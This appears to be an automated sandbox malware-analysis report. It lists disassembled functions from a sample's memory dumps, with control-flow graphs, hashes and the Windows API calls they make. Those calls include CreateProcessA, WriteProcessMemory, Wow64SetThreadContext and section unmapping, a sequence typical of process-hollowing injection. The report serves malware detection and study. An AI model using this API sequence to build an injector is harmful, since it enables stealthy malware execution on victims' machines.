                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: SectionUnmapView
                                                • String ID:
                                                • API String ID: 498011366-0
                                                • Opcode ID: 78d64de751b5b041cc73358370518527faee0a3c784e1d0260db3ebd9a76f9e4
                                                • Instruction ID: 8fad4f682145816dddf72454cee555798031f3a8784cb45d183e557ce279ad33
                                                • Opcode Fuzzy Hash: 78d64de751b5b041cc73358370518527faee0a3c784e1d0260db3ebd9a76f9e4
                                                • Instruction Fuzzy Hash: 51113AB19002598FCB20DFAAC845BDEFFF5EF89324F208829D459A7250CB75A544CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077223E0 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75f78a741a2b9701563e5100f75e097f981ece5b0213f9fc6185c827142ccd60
                                                • Instruction ID: 8f03eb2e6bf52fa46759dc3b4e482204ae3f225d49368908c298bbd10450298c
                                                • Opcode Fuzzy Hash: 75f78a741a2b9701563e5100f75e097f981ece5b0213f9fc6185c827142ccd60
                                                • Instruction Fuzzy Hash: E69158B0D15219DFCB48CFA5E58099DFBB2FF8A350F20A41AE426B7225DB309942DF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077223D1 Relevance: .2, Instructions: 223COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 144ef4a7068d260ae49a4b654c359964134d98516e2b36f9245d93d6a2c37897
                                                • Instruction ID: dfaa09d2ea6fe434bf54d9a5da70b7dd8913c4ee643019e08d4dcc6cc656ebca
                                                • Opcode Fuzzy Hash: 144ef4a7068d260ae49a4b654c359964134d98516e2b36f9245d93d6a2c37897
                                                • Instruction Fuzzy Hash: 6D9137B0E15219DFCB48CFA5E58099DFBB2FF89350F20A41AE426B7225DB349906DF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077220C8 Relevance: .2, Instructions: 204COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 273a1687e873874657d9a54fbbfbb0aabecaa881144d66d4ad0ef9a26b68e186
                                                • Instruction ID: 207a267a901d585f950ccd35dda450c7c152337fcc3b66daeeb86c468dd0e1ef
                                                • Opcode Fuzzy Hash: 273a1687e873874657d9a54fbbfbb0aabecaa881144d66d4ad0ef9a26b68e186
                                                • Instruction Fuzzy Hash: A08122B4E14229CFCF04CFA9C9819AEFBB1FB89340F10A95AE511B7215D7349942DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077220B8 Relevance: .2, Instructions: 202COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ffb9a7bcfed161e4b6886041901b656775dce621f983a41c1b618bcc4af445cc
                                                • Instruction ID: 7bfda873a9f80b8c95fd9268c1a64baf816bf63ff99ae0bebf22bedfcb0d61ca
                                                • Opcode Fuzzy Hash: ffb9a7bcfed161e4b6886041901b656775dce621f983a41c1b618bcc4af445cc
                                                • Instruction Fuzzy Hash: 6A8123B4E14229DFCF14CFA9C9819EEFBB2FB89340F00A95AE511A7215D7389902DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00FAD378 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 fad378-fad407 GetCurrentProcess 298 fad409-fad40f 294->298 299 fad410-fad444 GetCurrentThread 294->299 298->299 300 fad44d-fad481 GetCurrentProcess 299->300 301 fad446-fad44c 299->301 303 fad48a-fad4a2 300->303 304 fad483-fad489 300->304 301->300 307 fad4ab-fad4da GetCurrentThreadId 303->307 304->303 308 fad4dc-fad4e2 307->308 309 fad4e3-fad545 307->309 308->309
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00FAD3F6
                                                • GetCurrentThread.KERNEL32 ref: 00FAD433
                                                • GetCurrentProcess.KERNEL32 ref: 00FAD470
                                                • GetCurrentThreadId.KERNEL32 ref: 00FAD4C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 0f914a1ee6edf7cf5a8ff285a4e30528c561ae19921b5f782447b4c3ff80d25a
                                                • Instruction ID: 0e6dd4ca95c7d09a6ddb5aa24ee7aa2c3d07a2ab2b43cb792852e59a91d53a0b
                                                • Opcode Fuzzy Hash: 0f914a1ee6edf7cf5a8ff285a4e30528c561ae19921b5f782447b4c3ff80d25a
                                                • Instruction Fuzzy Hash: F45155B0D002498FDB14DFA9D548B9EBBF1AF48314F20C559E419A7360DB74A988CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E4FA8 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 337 52e4fa8-52e500a call 52e4324 343 52e500c-52e500e 337->343 344 52e5070-52e509c 337->344 345 52e5014-52e5020 343->345 346 52e50a3-52e50ab 343->346 344->346 351 52e5026-52e5061 call 52e4330 345->351 352 52e50b2-52e51ed 345->352 346->352 362 52e5066-52e506f 351->362 370 52e51f3-52e5201 352->370 371 52e520a-52e5250 370->371 372 52e5203-52e5209 370->372 377 52e525d 371->377 378 52e5252-52e5255 371->378 372->371 379 52e525e 377->379 378->377 379->379
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hbq$Hbq
                                                • API String ID: 0-4258043069
                                                • Opcode ID: 422f5d8d104cddec162aab2faeb52ceed0b470a89aacb3d4cf650e0c0de564c5
                                                • Instruction ID: 8ad64ed2767ccb8574d388b9e849c70fcd1a48a0af6a2a6bf3a40bee0f38b0ab
                                                • Opcode Fuzzy Hash: 422f5d8d104cddec162aab2faeb52ceed0b470a89aacb3d4cf650e0c0de564c5
                                                • Instruction Fuzzy Hash: 01818C70E103198FCB04DFA9C8946AEBBF2FF88300F64852AE409EB354DB749901CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E4B78 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 380 52e4b78-52e59da 383 52e59dc-52e5ab7 380->383 384 52e59e3-52e59f3 380->384 386 52e5abe-52e5b90 383->386 384->386 387 52e59f9-52e5a09 384->387 408 52e5b97-52e5bea call 52e4cfc 386->408 387->386 388 52e5a0f-52e5a13 387->388 391 52e5a1b-52e5a3a 388->391 392 52e5a15 388->392 393 52e5a3c-52e5a5c call 52e4cdc call 52e4b58 call 52e4b68 391->393 394 52e5a61-52e5a66 391->394 392->386 392->391 393->394 396 52e5a6f-52e5a82 call 52e4b34 394->396 397 52e5a68-52e5a6a call 52e4cec 394->397 407 52e5a88-52e5a8f 396->407 396->408 397->396
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (bq$Hbq
                                                • API String ID: 0-4081012451
                                                • Opcode ID: dbeb58df89beb998613f03fea737524ce839878482f4b21b8024179fb2baea1d
                                                • Instruction ID: e5f6eb872e787a130f76f9cbb6d82da701be8cf646ef072189249a63d96a1114
                                                • Opcode Fuzzy Hash: dbeb58df89beb998613f03fea737524ce839878482f4b21b8024179fb2baea1d
                                                • Instruction Fuzzy Hash: 8051E371B202198FCB14EFA8C88966F7FE6FF84310B108969E40697394DE34CD158B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E06E8 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 428 52e06e8-52e07f9 449 52e07fc call 52e1214 428->449 450 52e07fc call 52e1220 428->450 434 52e0802-52e081b 438 52e087d-52e0962 434->438 439 52e081d-52e0875 434->439 439->438 449->434 450->434
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $
                                                • API String ID: 0-227171996
                                                • Opcode ID: 66963b633425a4ae40bcf2098ed883fe0910a9e23bd75d5c18c38de60a441e4c
                                                • Instruction ID: 5851380bc39e70ab81bb19101ee75480cdfb631a278acf938d76d835ac8e2a00
                                                • Opcode Fuzzy Hash: 66963b633425a4ae40bcf2098ed883fe0910a9e23bd75d5c18c38de60a441e4c
                                                • Instruction Fuzzy Hash: F971C435910701CFDB10EF28E489659B7B2FF95314B4586A9D849AB31AEFB1F984CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E06F8 Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 451 52e06f8-52e07f9 471 52e07fc call 52e1214 451->471 472 52e07fc call 52e1220 451->472 456 52e0802-52e081b 460 52e087d-52e0962 456->460 461 52e081d-52e0875 456->461 461->460 471->456 472->456
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $
                                                • API String ID: 0-227171996
                                                • Opcode ID: 5ebc165764e01f9e5e4ae20b28fe78509fca236c6c3415a4a2806ac8406b4a77
                                                • Instruction ID: 5e8ea16a1a8dfd09fe74e63333854182dbab8f35438f505131841c23c9dd6b23
                                                • Opcode Fuzzy Hash: 5ebc165764e01f9e5e4ae20b28fe78509fca236c6c3415a4a2806ac8406b4a77
                                                • Instruction Fuzzy Hash: 0761B635910701CFDB10EF28E489659B7B2FF95314B4186A9D949AB31AEFB1F984CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772FADD Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 473 772fadd-772fb7d 476 772fbb6-772fbd6 473->476 477 772fb7f-772fb89 473->477 484 772fbd8-772fbe2 476->484 485 772fc0f-772fc3e 476->485 477->476 478 772fb8b-772fb8d 477->478 479 772fbb0-772fbb3 478->479 480 772fb8f-772fb99 478->480 479->476 482 772fb9b 480->482 483 772fb9d-772fbac 480->483 482->483 483->483 486 772fbae 483->486 484->485 487 772fbe4-772fbe6 484->487 491 772fc40-772fc4a 485->491 492 772fc77-772fd31 CreateProcessA 485->492 486->479 489 772fbe8-772fbf2 487->489 490 772fc09-772fc0c 487->490 493 772fbf6-772fc05 489->493 494 772fbf4 489->494 490->485 491->492 495 772fc4c-772fc4e 491->495 505 772fd33-772fd39 492->505 506 772fd3a-772fdc0 492->506 493->493 496 772fc07 493->496 494->493 497 772fc50-772fc5a 495->497 498 772fc71-772fc74 495->498 496->490 500 772fc5e-772fc6d 497->500 501 772fc5c 497->501 498->492 500->500 502 772fc6f 500->502 501->500 502->498 505->506 516 772fdc2-772fdc6 506->516 517 772fdd0-772fdd4 506->517 516->517 520 772fdc8 516->520 518 772fdd6-772fdda 517->518 519 772fde4-772fde8 517->519 518->519 521 772fddc 518->521 522 772fdea-772fdee 519->522 523 772fdf8-772fdfc 519->523 520->517 521->519 522->523 524 772fdf0 522->524 525 772fe0e-772fe15 523->525 526 772fdfe-772fe04 523->526 524->523 527 772fe17-772fe26 525->527 528 772fe2c 525->528 526->525 527->528 529 772fe2d 528->529 529->529
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0772FD1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: edd9d51724bace08a1b547e69e88d1e1210d66904da5a2363ac75ad649236eae
                                                • Instruction ID: 8088ef96617e0ffbb9467cfb1bf86088a7046d7c2a7f70c79ab7ce5031f8d413
                                                • Opcode Fuzzy Hash: edd9d51724bace08a1b547e69e88d1e1210d66904da5a2363ac75ad649236eae
                                                • Instruction Fuzzy Hash: 82A1ADB1D00229DFDB10CF68C851BEDBBB2FF48350F1485A9E818A7250DB749982DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772FAE8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 531 772fae8-772fb7d 533 772fbb6-772fbd6 531->533 534 772fb7f-772fb89 531->534 541 772fbd8-772fbe2 533->541 542 772fc0f-772fc3e 533->542 534->533 535 772fb8b-772fb8d 534->535 536 772fbb0-772fbb3 535->536 537 772fb8f-772fb99 535->537 536->533 539 772fb9b 537->539 540 772fb9d-772fbac 537->540 539->540 540->540 543 772fbae 540->543 541->542 544 772fbe4-772fbe6 541->544 548 772fc40-772fc4a 542->548 549 772fc77-772fd31 CreateProcessA 542->549 543->536 546 772fbe8-772fbf2 544->546 547 772fc09-772fc0c 544->547 550 772fbf6-772fc05 546->550 551 772fbf4 546->551 547->542 548->549 552 772fc4c-772fc4e 548->552 562 772fd33-772fd39 549->562 563 772fd3a-772fdc0 549->563 550->550 553 772fc07 550->553 551->550 554 772fc50-772fc5a 552->554 555 772fc71-772fc74 552->555 553->547 557 772fc5e-772fc6d 554->557 558 772fc5c 554->558 555->549 557->557 559 772fc6f 557->559 558->557 559->555 562->563 573 772fdc2-772fdc6 563->573 574 772fdd0-772fdd4 563->574 573->574 577 772fdc8 573->577 575 772fdd6-772fdda 574->575 576 772fde4-772fde8 574->576 575->576 578 772fddc 575->578 579 772fdea-772fdee 576->579 580 772fdf8-772fdfc 576->580 577->574 578->576 579->580 581 772fdf0 579->581 582 772fe0e-772fe15 580->582 583 772fdfe-772fe04 580->583 581->580 584 772fe17-772fe26 582->584 585 772fe2c 582->585 583->582 584->585 586 772fe2d 585->586 586->586
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0772FD1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 8384d39f13679a1e1b38fda8a4e6cd600fa469253c171564e6b5d91d8d95e5f0
                                                • Instruction ID: 9220aa538bce3c78b0ddcf89da1017bdfbef06ffad4beb51771060a649a74eec
                                                • Opcode Fuzzy Hash: 8384d39f13679a1e1b38fda8a4e6cd600fa469253c171564e6b5d91d8d95e5f0
                                                • Instruction Fuzzy Hash: D5918EB1D00229DFDB14CF68C851BEDBBB2FF48350F1485A9E818A7250DB749986DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00FAACE8 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 588 faace8-faacf7 589 faacf9-faad06 call faa040 588->589 590 faad23-faad27 588->590 595 faad08 589->595 596 faad1c 589->596 591 faad3b-faad7c 590->591 592 faad29-faad33 590->592 599 faad89-faad97 591->599 600 faad7e-faad86 591->600 592->591 645 faad0e call faaf7b 595->645 646 faad0e call faaf80 595->646 596->590 602 faadbb-faadbd 599->602 603 faad99-faad9e 599->603 600->599 601 faad14-faad16 601->596 604 faae58-faaed4 601->604 605 faadc0-faadc7 602->605 606 faada9 603->606 607 faada0-faada7 call faa04c 603->607 638 faaf00-faaf18 604->638 639 faaed6-faaefe 604->639 610 faadc9-faadd1 605->610 611 faadd4-faaddb 605->611 609 faadab-faadb9 606->609 607->609 609->605 610->611 613 faade8-faadf1 call faa05c 611->613 614 faaddd-faade5 611->614 619 faadfe-faae03 613->619 620 faadf3-faadfb 613->620 614->613 621 faae21-faae25 619->621 622 faae05-faae0c 619->622 620->619 627 faae2b-faae2e 621->627 622->621 624 faae0e-faae1e call faa06c call faa07c 622->624 624->621 629 faae30-faae4e 627->629 630 faae51-faae57 627->630 629->630 640 faaf1a-faaf1d 638->640 641 faaf20-faaf4b GetModuleHandleW 638->641 639->638 640->641 642 faaf4d-faaf53 641->642 643 faaf54-faaf68 641->643 642->643 645->601 646->601
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00FAAF3E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 053b6c7cdf90d7669d82887a9bf183d7944af72894a3ab70eb6d1f66154ecf19
                                                • Instruction ID: 73493e83f26c24ce96b90fc093f7ff4fb6247eafeec71d5579619da5c6472a3c
                                                • Opcode Fuzzy Hash: 053b6c7cdf90d7669d82887a9bf183d7944af72894a3ab70eb6d1f66154ecf19
                                                • Instruction Fuzzy Hash: 038165B0A00B058FD724DF29D44575ABBF1FF89314F008A2DD08ADBA50D739E94ADB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00FA44E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 758 fa44e4-fa59b9 CreateActCtxA 761 fa59bb-fa59c1 758->761 762 fa59c2-fa5a1c 758->762 761->762 769 fa5a2b-fa5a2f 762->769 770 fa5a1e-fa5a21 762->770 771 fa5a40 769->771 772 fa5a31-fa5a3d 769->772 770->769 774 fa5a41 771->774 772->771 774->774
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00FA59A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f0bc64aa47e3e772c03130ac09c57a169690896fe385fe87c0905523bb99d26f
                                                • Instruction ID: 7240c8ee104ed9f4f843ee7dc2741cf444d51726dd2b7aa0b58f391d0d660d1c
                                                • Opcode Fuzzy Hash: f0bc64aa47e3e772c03130ac09c57a169690896fe385fe87c0905523bb99d26f
                                                • Instruction Fuzzy Hash: 8741F2B0D0071DCFDB24DFA9C884B8EBBB9BF49704F20816AD408AB251DB756949CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00FA58F3 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 775 fa58f3-fa59b9 CreateActCtxA 777 fa59bb-fa59c1 775->777 778 fa59c2-fa5a1c 775->778 777->778 785 fa5a2b-fa5a2f 778->785 786 fa5a1e-fa5a21 778->786 787 fa5a40 785->787 788 fa5a31-fa5a3d 785->788 786->785 790 fa5a41 787->790 788->787 790->790
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00FA59A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 411401ea26a3a363ed98725144dabf907c7107ed76c253781e94d06872e36951
                                                • Instruction ID: bce31f1b0a2b4cc2ab583c868c6d1605011a836e7b7f0a3382f95082ce64b725
                                                • Opcode Fuzzy Hash: 411401ea26a3a363ed98725144dabf907c7107ed76c253781e94d06872e36951
                                                • Instruction Fuzzy Hash: 484103B0D00729CFDB24CFA9C884BDEBBB5BF49304F24816AD448AB251DB75594ACF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F859 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 791 772f859-772f8ae 794 772f8b0-772f8bc 791->794 795 772f8be-772f8fd WriteProcessMemory 791->795 794->795 797 772f906-772f936 795->797 798 772f8ff-772f905 795->798 798->797
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0772F8F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 599cda1e2c56514d661c68a761a614c4b50d5d4472ae2774f997bba4fe35a89f
                                                • Instruction ID: 6f436b225d4b7d44e5b338d0b6569157b8b1b661f9c07b87c5312a324eb1228a
                                                • Opcode Fuzzy Hash: 599cda1e2c56514d661c68a761a614c4b50d5d4472ae2774f997bba4fe35a89f
                                                • Instruction Fuzzy Hash: 3F2148B29003599FCB10DFA9C885BEEBBF5FF48350F10842AE958A7250C7749554DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F860 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 802 772f860-772f8ae 804 772f8b0-772f8bc 802->804 805 772f8be-772f8fd WriteProcessMemory 802->805 804->805 807 772f906-772f936 805->807 808 772f8ff-772f905 805->808 808->807
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0772F8F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 141acf708e92717cd80b0add94df15d294feb952eaabbaf1cf8d4d3bb36c2439
                                                • Instruction ID: 8b99fa1739514d314fe62601219cef806a6d4af6c258858428812b5353ba29f6
                                                • Opcode Fuzzy Hash: 141acf708e92717cd80b0add94df15d294feb952eaabbaf1cf8d4d3bb36c2439
                                                • Instruction Fuzzy Hash: 972127B29003599FCB10DFA9C885BDEBBF5FF48310F108429E959A7250C7789954DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F948 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0772F9D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 8773771eb6fd9657538ef261303ea35ebf9e36ff3f7095e32b2cd81514e883dc
                                                • Instruction ID: d82f4a51ec7b8e960240f508bf9234afcdc0e0610e7774e0324467fd36a2f2ec
                                                • Opcode Fuzzy Hash: 8773771eb6fd9657538ef261303ea35ebf9e36ff3f7095e32b2cd81514e883dc
                                                • Instruction Fuzzy Hash: 202148B19002599FCB10DFAAC885BEEFBF5FF48320F10842AE558A7250C7389945CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F6C2 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0772F746
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 8e6fd76101e58c9a44c0120037bf4b46d672401f6a08f99eab4e54ddbb395b9b
                                                • Instruction ID: fb859d0a8a70e0ac435c0054d36134d3eb538ec81405cc64847045b429661dce
                                                • Opcode Fuzzy Hash: 8e6fd76101e58c9a44c0120037bf4b46d672401f6a08f99eab4e54ddbb395b9b
                                                • Instruction Fuzzy Hash: A0216AB19002198FDB10DFAAC4857EEBBF4EF48324F508429D459A7340C7789985CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F6C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0772F746
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 35725a75feefd5e2213f33d8c1df626ae4d16459bb0a282e802f53fced9c9e2c
                                                • Instruction ID: 8bd787d42403a94fc38f15dde2f1a281feb26368ae95072a98dd7056bf03db73
                                                • Opcode Fuzzy Hash: 35725a75feefd5e2213f33d8c1df626ae4d16459bb0a282e802f53fced9c9e2c
                                                • Instruction Fuzzy Hash: 172138B19002198FDB10DFAAC4857EEBBF4EF48364F508429D459A7340C7789945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F950 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0772F9D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 47dadd709102e97ce462c8015da334be9a9195880f64efcb7def140667e13d69
